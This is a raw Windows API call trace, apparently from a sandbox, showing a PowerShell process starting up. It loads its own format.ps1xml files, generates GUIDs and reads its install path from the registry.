	[0726.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0726.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0726.725] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xcd11f37c, Data2=0x3f69, Data3=0x4e47, Data4=([0]=0xa2, [1]=0x6d, [2]=0x46, [3]=0x62, [4]=0x4a, [5]=0xc3, [6]=0x1a, [7]=0x57))) returned 0x0
	[0726.726] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xe5bc72fe, Data2=0x3bb6, Data3=0x4041, Data4=([0]=0xb2, [1]=0x96, [2]=0x1a, [3]=0x25, [4]=0x48, [5]=0x3e, [6]=0x17, [7]=0xc3))) returned 0x0
	[0726.726] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x7626e1a3, Data2=0xdc24, Data3=0x4640, Data4=([0]=0x88, [1]=0xa5, [2]=0x8b, [3]=0xde, [4]=0x29, [5]=0x69, [6]=0xf8, [7]=0x83))) returned 0x0
	[0726.727] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xac5a07be, Data2=0x9900, Data3=0x425d, Data4=([0]=0xa2, [1]=0xaa, [2]=0x25, [3]=0x74, [4]=0x4c, [5]=0x1d, [6]=0x7b, [7]=0x10))) returned 0x0
	[0726.727] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x8e77a0a5, Data2=0x99af, Data3=0x45e1, Data4=([0]=0xb3, [1]=0x4b, [2]=0xb6, [3]=0xd6, [4]=0xa0, [5]=0xc5, [6]=0x34, [7]=0x21))) returned 0x0
	[0726.727] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xa9a712e, Data2=0x3060, Data3=0x4a99, Data4=([0]=0x8e, [1]=0x45, [2]=0x20, [3]=0x21, [4]=0x82, [5]=0xf6, [6]=0xef, [7]=0x1d))) returned 0x0
	[0726.727] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xd2183579, Data2=0xf3f1, Data3=0x47e2, Data4=([0]=0xa7, [1]=0x7a, [2]=0xc1, [3]=0x14, [4]=0x77, [5]=0x99, [6]=0x85, [7]=0xce))) returned 0x0
	[0726.728] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xd4182875, Data2=0x55de, Data3=0x4fe1, Data4=([0]=0xbc, [1]=0x22, [2]=0xce, [3]=0xe9, [4]=0x81, [5]=0xc9, [6]=0x3d, [7]=0xb7))) returned 0x0
	[0726.728] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x89a9666d, Data2=0x84d, Data3=0x44c3, Data4=([0]=0xb5, [1]=0xef, [2]=0x80, [3]=0xa4, [4]=0xd2, [5]=0x71, [6]=0x93, [7]=0x29))) returned 0x0
	[0726.728] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xef36fd5, Data2=0xf8b9, Data3=0x4de3, Data4=([0]=0x80, [1]=0xe4, [2]=0xc7, [3]=0xe2, [4]=0x1a, [5]=0x58, [6]=0xb7, [7]=0xdc))) returned 0x0
	[0726.728] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x6134d893, Data2=0xa23c, Data3=0x422c, Data4=([0]=0x91, [1]=0x69, [2]=0xee, [3]=0x9d, [4]=0x4e, [5]=0x39, [6]=0x91, [7]=0x95))) returned 0x0
	[0726.728] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xf683aff7, Data2=0xecb4, Data3=0x493e, Data4=([0]=0x8c, [1]=0x56, [2]=0x1, [3]=0xd0, [4]=0xd6, [5]=0x3c, [6]=0x63, [7]=0xb0))) returned 0x0
	[0726.730] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x10d82926, Data2=0x4ace, Data3=0x4c2f, Data4=([0]=0xbe, [1]=0x6a, [2]=0x3d, [3]=0xfe, [4]=0xe, [5]=0x6a, [6]=0x67, [7]=0x43))) returned 0x0
	[0726.730] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x4878ae44, Data2=0xd194, Data3=0x498f, Data4=([0]=0x92, [1]=0xc9, [2]=0x24, [3]=0x72, [4]=0xc4, [5]=0xfb, [6]=0xe1, [7]=0xfa))) returned 0x0
	[0726.731] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x1b5859df, Data2=0x6480, Data3=0x47a4, Data4=([0]=0x9d, [1]=0x9e, [2]=0xcd, [3]=0xb6, [4]=0x90, [5]=0x88, [6]=0xdb, [7]=0xc4))) returned 0x0
	[0726.731] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xebb44749, Data2=0x99b9, Data3=0x49ce, Data4=([0]=0x92, [1]=0xc1, [2]=0xe4, [3]=0xc, [4]=0x6a, [5]=0x2, [6]=0xff, [7]=0x83))) returned 0x0
	[0726.731] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x61555b09, Data2=0xf1e4, Data3=0x4e89, Data4=([0]=0xa6, [1]=0x97, [2]=0xce, [3]=0x66, [4]=0x23, [5]=0xa0, [6]=0xd0, [7]=0x0))) returned 0x0
	[0726.731] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x6ff84711, Data2=0x8587, Data3=0x49b3, Data4=([0]=0xb3, [1]=0xaf, [2]=0xc5, [3]=0x64, [4]=0x71, [5]=0x91, [6]=0x34, [7]=0x13))) returned 0x0
	[0726.731] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xff62531c, Data2=0x86bf, Data3=0x4d54, Data4=([0]=0x82, [1]=0x43, [2]=0x33, [3]=0xc1, [4]=0xf1, [5]=0xcc, [6]=0x3, [7]=0xb7))) returned 0x0
	[0726.732] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x485fbefb, Data2=0x7f9a, Data3=0x4ab1, Data4=([0]=0x96, [1]=0x50, [2]=0x6f, [3]=0x23, [4]=0x37, [5]=0x86, [6]=0x93, [7]=0xf4))) returned 0x0
	[0726.732] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xb5577ee5, Data2=0x880f, Data3=0x49f7, Data4=([0]=0xb2, [1]=0x7a, [2]=0x4e, [3]=0x6d, [4]=0xb, [5]=0x21, [6]=0xc5, [7]=0x6a))) returned 0x0
	[0726.732] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x2a62ff5a, Data2=0x9675, Data3=0x4c06, Data4=([0]=0xb0, [1]=0x65, [2]=0x6d, [3]=0x85, [4]=0x76, [5]=0x71, [6]=0xd, [7]=0xa5))) returned 0x0
	[0726.732] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xed46a37c, Data2=0x4dc4, Data3=0x4442, Data4=([0]=0xad, [1]=0x94, [2]=0x4e, [3]=0x9c, [4]=0xca, [5]=0xc7, [6]=0x2a, [7]=0x22))) returned 0x0
	[0726.732] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xc1d6b301, Data2=0x784f, Data3=0x4423, Data4=([0]=0x97, [1]=0x34, [2]=0x5b, [3]=0x28, [4]=0x2b, [5]=0x2c, [6]=0x32, [7]=0x9))) returned 0x0
	[0726.733] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x4238e303, Data2=0x4977, Data3=0x40e0, Data4=([0]=0x95, [1]=0xa1, [2]=0x8f, [3]=0x16, [4]=0x34, [5]=0x9a, [6]=0x49, [7]=0x45))) returned 0x0
	[0726.733] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x30783d43, Data2=0xc535, Data3=0x49c8, Data4=([0]=0xba, [1]=0xab, [2]=0x13, [3]=0xeb, [4]=0xa8, [5]=0xb4, [6]=0x6c, [7]=0xb7))) returned 0x0
	[0726.733] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xa2d0f041, Data2=0x5338, Data3=0x4266, Data4=([0]=0x8a, [1]=0xb3, [2]=0xd0, [3]=0x4b, [4]=0x4b, [5]=0xaf, [6]=0x99, [7]=0x7e))) returned 0x0
	[0726.733] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x20efbacd, Data2=0xf50f, Data3=0x4351, Data4=([0]=0xab, [1]=0x4c, [2]=0x5, [3]=0x9f, [4]=0xbf, [5]=0x31, [6]=0x48, [7]=0x7d))) returned 0x0
	[0726.733] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xcb6ca83b, Data2=0x87ed, Data3=0x4da9, Data4=([0]=0x92, [1]=0x55, [2]=0xe7, [3]=0x50, [4]=0xfe, [5]=0x72, [6]=0x4e, [7]=0x5c))) returned 0x0
	[0726.733] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x3c26edb3, Data2=0x7927, Data3=0x49c1, Data4=([0]=0x9b, [1]=0xc8, [2]=0xd5, [3]=0xc3, [4]=0x9e, [5]=0xdd, [6]=0x60, [7]=0xc))) returned 0x0
	[0726.734] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x6187eecc, Data2=0xa32f, Data3=0x41ac, Data4=([0]=0x87, [1]=0xab, [2]=0x75, [3]=0x9c, [4]=0xe3, [5]=0x42, [6]=0x8, [7]=0x2))) returned 0x0
	[0726.734] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x86b13b61, Data2=0xe852, Data3=0x46ac, Data4=([0]=0x80, [1]=0x85, [2]=0x75, [3]=0xa, [4]=0xa6, [5]=0x44, [6]=0xe4, [7]=0x22))) returned 0x0
	[0726.734] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x95d833ca, Data2=0x7c63, Data3=0x4255, Data4=([0]=0x9d, [1]=0x70, [2]=0x18, [3]=0x72, [4]=0xb3, [5]=0xa8, [6]=0x3f, [7]=0x71))) returned 0x0
	[0726.734] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x3741f196, Data2=0xf7e8, Data3=0x4d40, Data4=([0]=0x8e, [1]=0x69, [2]=0x97, [3]=0x33, [4]=0x8c, [5]=0x2b, [6]=0xfe, [7]=0xf8))) returned 0x0
	[0726.734] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x686d6af5, Data2=0x1b53, Data3=0x4176, Data4=([0]=0x9b, [1]=0xf7, [2]=0xd4, [3]=0x39, [4]=0x6c, [5]=0x11, [6]=0xdd, [7]=0x60))) returned 0x0
	[0726.734] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x9c559cf8, Data2=0xf1f8, Data3=0x4e32, Data4=([0]=0xb8, [1]=0x7c, [2]=0x8b, [3]=0xd8, [4]=0x7c, [5]=0xd9, [6]=0xf2, [7]=0x7a))) returned 0x0
	[0726.735] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xfc9bc89e, Data2=0x29af, Data3=0x49e5, Data4=([0]=0xa2, [1]=0xaf, [2]=0x75, [3]=0x4c, [4]=0xd3, [5]=0xcc, [6]=0xeb, [7]=0x2a))) returned 0x0
	[0726.735] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0726.736] GetFileType (hFile=0x2e4) returned 0x1
	[0726.736] SetErrorMode (uMode=0x1) returned 0x1
	[0726.736] GetFileType (hFile=0x2e4) returned 0x1
	[0726.736] ReadFile (in: hFile=0x2e4, lpBuffer=0x34d3208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34d3208*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.737] ReadFile (in: hFile=0x2e4, lpBuffer=0x34d3208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34d3208*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.737] ReadFile (in: hFile=0x2e4, lpBuffer=0x34d3208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34d3208*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.737] ReadFile (in: hFile=0x2e4, lpBuffer=0x34d3208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34d3208*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.738] ReadFile (in: hFile=0x2e4, lpBuffer=0x34d3208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34d3208*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.738] ReadFile (in: hFile=0x2e4, lpBuffer=0x34d3208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34d3208*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.738] ReadFile (in: hFile=0x2e4, lpBuffer=0x34d3208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34d3208*, lpNumberOfBytesRead=0xed098*=0x119, lpOverlapped=0x0) returned 1
	[0726.738] ReadFile (in: hFile=0x2e4, lpBuffer=0x34d3208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x34d3208*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0726.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x2e4) returned 0x0
	[0726.738] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0726.738] CoTaskMemAlloc (cb=0x5a) returned 0x1b976350
	[0726.739] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976350, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0726.739] CoTaskMemFree (pv=0x1b976350) 
	[0726.739] RegCloseKey (hKey=0x2e4) returned 0x0
	[0726.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0726.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0726.740] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x328f1000, Data2=0xff59, Data3=0x4ff3, Data4=([0]=0xa0, [1]=0xd5, [2]=0xa, [3]=0x0, [4]=0xc9, [5]=0x20, [6]=0x2f, [7]=0x9f))) returned 0x0
	[0726.740] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xf5ed77db, Data2=0x24e5, Data3=0x42b6, Data4=([0]=0xbf, [1]=0xc8, [2]=0xfb, [3]=0x8c, [4]=0x76, [5]=0xf1, [6]=0x6e, [7]=0xb9))) returned 0x0
	[0726.740] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x75334ebb, Data2=0x1867, Data3=0x4e6d, Data4=([0]=0xa6, [1]=0x31, [2]=0x0, [3]=0xc2, [4]=0x23, [5]=0x79, [6]=0xec, [7]=0x40))) returned 0x0
	[0726.741] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xdd22c30a, Data2=0xc051, Data3=0x4d83, Data4=([0]=0xae, [1]=0xe0, [2]=0x9b, [3]=0xc, [4]=0x11, [5]=0x7e, [6]=0xae, [7]=0x20))) returned 0x0
	[0726.741] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0726.741] GetFileType (hFile=0x2e4) returned 0x1
	[0726.741] SetErrorMode (uMode=0x1) returned 0x1
	[0726.741] GetFileType (hFile=0x2e4) returned 0x1
	[0726.741] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.742] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.742] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.742] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.742] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.742] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.742] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.743] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.744] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.744] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.745] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.745] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.745] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.746] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.746] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.746] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.749] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.749] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.749] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.750] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.750] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.750] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.750] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.751] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0726.751] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.387] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.387] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.388] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.388] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.388] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.388] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.389] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.393] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.393] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.393] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.394] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.394] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.394] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
